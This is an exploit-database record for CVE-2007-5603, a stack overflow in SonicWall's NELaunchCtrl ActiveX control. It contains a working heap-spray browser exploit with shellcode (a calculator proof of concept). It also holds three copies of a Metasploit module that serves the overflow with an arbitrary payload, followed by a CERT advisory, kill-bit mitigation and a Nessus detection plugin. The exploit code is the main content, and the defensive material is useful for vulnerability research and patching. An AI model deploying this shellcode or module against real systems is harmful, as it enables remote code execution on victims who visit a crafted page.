SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit
2007-11-01T00:00:00
ID EDB-ID:4594 Type exploitdb Reporter krafty Modified 2007-11-01T00:00:00
Description
SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit. CVE-2007-5603. Remote exploit for windows platform
<!--
SonicWall SSL-VPN NeLaunchCtrl ActiveX Control exploit.
by krafty
greets to SK, muts, halvar, grugq, and all the ethnical hackers
sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
Bring back the days of technotronic and r00tshell! Freedom.
poc: launches calculator.
Tested with IE6 XP SP2. I'm sure it works with IE7 and Vista and all
that jing-bang.
-->
<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='nelx' /></object>
<script>
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000");
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
spray += spray;
} while(spray.length < 0xc0000);
memory = new Array();
for(i = 0; i < 50; i++)
memory[i] = spray + shellcode;
buf = "";
for(i = 0; i < 50; i++)
buf += unescape("%05%05%05%05");
nelx.AddRouteEntry("", buf);
</script>
# milw0rm.com [2007-11-01]
{"id": "EDB-ID:4594", "hash": "a40331f604521b101aa276cecd8bd33b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit", "description": "SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit. CVE-2007-5603. Remote exploit for windows platform", "published": "2007-11-01T00:00:00", "modified": "2007-11-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/4594/", "reporter": "krafty", "references": [], "cvelist": ["CVE-2007-5603"], "lastseen": "2016-01-31T21:18:09", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2016-01-31T21:18:09"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5603"]}, {"type": "cert", "idList": ["VU:298521"]}, {"type": "exploitdb", "idList": ["EDB-ID:16616"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/SONICWALL_ADDROUTEENTRY"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83233"]}, {"type": "osvdb", "idList": ["OSVDB:39069"]}, {"type": "nessus", "idList": ["SONICWALL_NELX_ACTIVEX_OVERFLOW.NASL"]}], "modified": "2016-01-31T21:18:09"}, "vulnersScore": 8.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4594/", "sourceData": "<!--\n\nSonicWall SSL-VPN NeLaunchCtrl ActiveX Control exploit.\n\nby krafty\n\ngreets to SK, muts, halvar, grugq, and all the ethnical hackers\n\nsux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.\n\nBring back the days of technotronic and r00tshell! Freedom.\n\npoc: launches calculator.\nTested with IE6 XP SP2. I'm sure it works with IE7 and Vista and all\nthat jing-bang.\n\n-->\n\n\n<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='nelx' /></object>\n\n<script>\n\nvar shellcode = unescape(\"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000\");\n\nvar spray = unescape(\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090\");\ndo {\n spray += spray;\n} while(spray.length < 0xc0000);\n\nmemory = new Array();\n\nfor(i = 0; i < 50; i++)\n memory[i] = spray + shellcode;\n\nbuf = \"\";\nfor(i = 0; i < 50; i++)\n buf += unescape(\"%05%05%05%05\");\n\nnelx.AddRouteEntry(\"\", buf);\n\n</script>\n\n# milw0rm.com [2007-11-01]\n", "osvdbidlist": ["39069"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:02", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote attackers to execute arbitrary code via a long string in the second argument to the AddRouteEntry method.", "modified": "2018-10-15T21:45:00", "id": "CVE-2007-5603", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5603", "published": "2007-11-05T18:46:00", "title": "CVE-2007-5603", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:50:39", "bulletinFamily": "info", "description": "### Overview \n\nThe SonicWall NetExtender NELaunchCtrl ActiveX control contains a stack buffer overflow, which could allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nSonicWall NetExtender is an SSL VPN client that is implemented by using an ActiveX control. The NELaunchCtrl ActiveX control, which is provided by `NELaunchX.dll`, contains a stack buffer overflow in the `AddRouteEntry()` method.\n\nExploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), a remote, unauthenticated attacker may be able to execute arbitrary code with the privileges of the user on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis vulnerability is addressed in the client software provided by the 2.5 firmware for the SonicWall NetExtender 4000 and 2000 series VPN units. This update provides version 2.5.0.53 of the NELaunchCtrl ActiveX control. The vulnerability is also addressed by the 2.1 Patch Build for the SonicWall NetExtender 200 series VPN units. This update provides version 2.1.0.51 of the NELaunchCtrl ActiveX control. These updates can be obtained from the [SonicWall Support](<http://www.sonicwall.com/us/643.htm>) page. Please note that the client systems must connect to a NetExtender SSL VPN unit to obtain the fixed control. If you are unable to obtain a fixed version of the control, please consider the following workarounds: \n \n--- \n \n \n**Disable the NELaunchCtrl ActiveX control in Internet Explorer** \n \nThe vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{6EEFD7B1-B26C-440D-B55A-1EC677189F30}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\``{6EEFD7B1-B26C-440D-B55A-1EC677189F30}``]` \n`\"Compatibility Flags\"=dword:00000400` \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser](<http://www.cert.org/tech_tips/securing_browser/#Internet_Explorer>)\" document. \n \n--- \n \n### Vendor Information\n\n298521\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ SonicWall\n\nNotified: September 20, 2007 Updated: November 05, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`SSL-VPN 200 Platform \n-------------------- \nThe fix was made publicly available on 7/20/07 with the web-post of \n2.1.0.0-8sv. The web-posted firmware contains version 2.1.0.51 of the \nNELaunchCtrl ActiveX control, which fixed the issue. \n \nSSL-VPN 2000/4000 Platform \n-------------------------- \nThe fix was first made publicly available on 10/22/07 with the web-post \nof 2.5.0.0-9sv. The web-posted firmware contains version 2.5.0.53 of \nthe NELaunchCtrl ActiveX control, which fixed the issue.`\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nThese updates can be obtained from the [SonicWall Support](<http://www.sonicwall.com/us/643.htm>) page. Please note that the client systems must connect to a NetExtender SSL VPN unit to obtain the fixed control. If you are unable to obtain a fixed version of the control, please disable the ActiveX control.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298521 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.sec-consult.com/fileadmin/Advisories/20071101-0_sonicwall_multiple.txt>\n * <http://www.sonicwall.com/us/643.htm>\n * <http://secunia.com/advisories/27469/>\n\n### Acknowledgements\n\nThis vulnerability was reported by Will Dormann of the CERT/CC. It was also independently discovered by lofi42.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-5603](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5603>) \n---|--- \n**Severity Metric:****** | 25.92 \n**Date Public:** | 2007-11-01 \n**Date First Published:** | 2007-11-02 \n**Date Last Updated: ** | 2009-04-13 17:15 UTC \n**Document Revision: ** | 9 \n", "modified": "2009-04-13T17:15:00", "published": "2007-11-02T00:00:00", "id": "VU:298521", "href": "https://www.kb.cert.org/vuls/id/298521", "type": "cert", "title": "SonicWall NetExtender NELaunchCtrl ActiveX control stack buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T06:05:33", "bulletinFamily": "exploit", "description": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow. CVE-2007-5603. Remote exploit for windows platform", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "EDB-ID:16616", "href": "https://www.exploit-db.com/exploits/16616/", "type": "exploitdb", "title": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", "sourceData": "##\r\n# $Id: sonicwall_addrouteentry.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\r\n\t\t\t\tBy sending an overly long string to the \"AddRouteEntry()\" method located\r\n\t\t\t\tin the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\r\n\t\t\t\tarbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5603'],\r\n\t\t\t\t\t[ 'OSVDB', '39069'],\r\n\t\t\t\t\t[ 'URL', 'http://www.sec-consult.com/303.html' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'IE 6 / Windows XP SP2 Pro English', { 'Ret' => 0x7e497c7b } ], # 11/01/07\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Nov 1 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Randomize some things\r\n\t\tvname\t= rand_text_alpha(rand(100) + 1)\r\n\t\tstrname\t= rand_text_alpha(rand(100) + 1)\r\n\r\n\t\t# Set the exploit buffer\r\n\t\tsploit = rand_text_english(36) + [target.ret].pack('V')\r\n\t\tsploit << p.encoded + rand_text_english(1024 - p.encoded.length)\r\n\r\n\t\t# Build out the message\r\n\t\tcontent = %Q|<html>\r\n\t\t\t<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='#{vname}'></object>\r\n\t\t\t<script language='javascript'>\r\n\t\t\tvar #{vname} = document.getElementById('#{vname}');\r\n\t\t\tvar #{strname} = new String('#{sploit}');\r\n\t\t\t#{vname}.AddRouteEntry(#{strname}, #{vname});\r\n\t\t\t</script>\r\n\t\t\t</html>\r\n\t\t\t|\r\n\r\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16616/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:44", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83233/SonicWall-SSL-VPN-NetExtender-ActiveX-Control-Buffer-Overflow.html", "id": "PACKETSTORM:83233", "type": "packetstorm", "title": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in SonicWall SSL-VPN NetExtender. \nBy sending an overly long string to the \"AddRouteEntry()\" method located \nin the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute \narbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-5603'], \n[ 'OSVDB', '39069'], \n[ 'URL', 'http://www.sec-consult.com/303.html' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'IE 6 / Windows XP SP2 Pro English', { 'Ret' => 0x7e497c7b } ], # 11/01/07 \n], \n'DisclosureDate' => 'Nov 1 2007', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Randomize some things \nvname = rand_text_alpha(rand(100) + 1) \nstrname = rand_text_alpha(rand(100) + 1) \n \n# Set the exploit buffer \nsploit = rand_text_english(36) + [target.ret].pack('V') \nsploit << p.encoded + rand_text_english(1024 - p.encoded.length) \n \n# Build out the message \ncontent = %Q| \n<html> \n<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='#{vname}'></object> \n<script language='javascript'> \nvar #{vname} = document.getElementById('#{vname}'); \nvar #{strname} = new String('#{sploit}'); \n#{vname}.AddRouteEntry(#{strname}, #{vname}); \n</script> \n</html> \n| \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83233/sonicwall_addrouteentry.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018891\n[Secunia Advisory ID:27469](https://secuniaresearch.flexerasoftware.com/advisories/27469/)\nOther Advisory URL: http://www.sec-consult.com/fileadmin/Advisories/20071101-0_sonicwall_multiple.txt\nOther Advisory URL: http://www.sec-consult.com/303.html\nOther Advisory URL: http://securityreason.com/securityalert/3342\nKeyword: clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30\nISS X-Force ID: 38220\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4594\nFrSIRT Advisory: ADV-2007-3696\n[CVE-2007-5603](https://vulners.com/cve/CVE-2007-5603)\nCERT VU: 298521\nBugtraq ID: 26288\n", "modified": "2007-11-01T00:00:00", "published": "2007-11-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39069", "id": "OSVDB:39069", "title": "SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX AddRouteEntry Method Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-10-16T15:59:31", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender. By sending an overly long string to the \"AddRouteEntry()\" method located in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2007-11-01T23:15:34", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/SONICWALL_ADDROUTEENTRY", "href": "", "type": "metasploit", "title": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n By sending an overly long string to the \"AddRouteEntry()\" method located\n in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-5603'],\n [ 'OSVDB', '39069'],\n [ 'URL', 'http://www.sec-consult.com/303.html' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'IE 6 / Windows XP SP2 Pro English', { 'Ret' => 0x7e497c7b } ], # 11/01/07\n ],\n 'DisclosureDate' => 'Nov 1 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_english(36) + [target.ret].pack('V')\n sploit << p.encoded + rand_text_english(1024 - p.encoded.length)\n\n # Build out the message\n content = %Q|<html>\n <object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.AddRouteEntry(#{strname}, #{vname});\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/sonicwall_addrouteentry.rb"}], "nessus": [{"lastseen": "2019-02-21T01:10:16", "bulletinFamily": "scanner", "description": "The remote host contains the 'NELaunchCtrl' ActiveX control included with the SonicWALL NetExtender VPN client software. \n\nThe version of this control installed on the remote host fails to validate arguments to several methods, such as 'AddRouteEntry', 'serverAddress', 'sessionId', 'clientIPLower', etc. If a remote attacker can trick a user on the affected host into visiting a specially crafted web page, the attacker could leverage these issues to overflow a buffer and execute arbitrary code on the host subject to the user's privileges.", "modified": "2018-11-15T00:00:00", "id": "SONICWALL_NELX_ACTIVEX_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27618", "published": "2007-11-03T00:00:00", "title": "SonicWALL SSL-VPN NetExtender NELaunchCtrl ActiveX Control Multiple Overflows", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27618);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2007-5603\", \"CVE-2007-5814\");\n script_bugtraq_id(26288);\n script_xref(name:\"CERT\", value:\"298521\");\n\n script_name(english:\"SonicWALL SSL-VPN NetExtender NELaunchCtrl ActiveX Control Multiple Overflows\");\n script_summary(english:\"Checks version of NELaunchCtrl ActiveX control\"); \n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nbuffer overflow vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains the 'NELaunchCtrl' ActiveX control included\nwith the SonicWALL NetExtender VPN client software. \n\nThe version of this control installed on the remote host fails to\nvalidate arguments to several methods, such as 'AddRouteEntry',\n'serverAddress', 'sessionId', 'clientIPLower', etc. If a remote\nattacker can trick a user on the affected host into visiting a\nspecially crafted web page, the attacker could leverage these issues \nto overflow a buffer and execute arbitrary code on the host subject to\nthe user's privileges.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/483097/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Nov/12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.1.0.51 / 2.5.0.56 or later of the control.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/11/03\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/11/01\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:sonicwall:ssl_vpn\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = \"{6EEFD7B1-B26C-440D-B55A-1EC677189F30}\";\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n # Check its version.\n ver = activex_get_fileversion(clsid:clsid);\n if (\n ver && \n (\n ver =~ \"^[01]\\.\" ||\n (\n ver =~ \"^2\\.1\\.\" && \n activex_check_fileversion(clsid:clsid, fix:\"2.1.0.51\") == TRUE\n ) ||\n (\n ver =~ \"^2\\.5\\.\" && \n activex_check_fileversion(clsid:clsid, fix:\"2.5.0.56\") == TRUE\n )\n )\n )\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"Version \", ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"Version \", ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report) security_hole(port:kb_smb_transport(), extra:report);\n }\n}\nactivex_end();\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
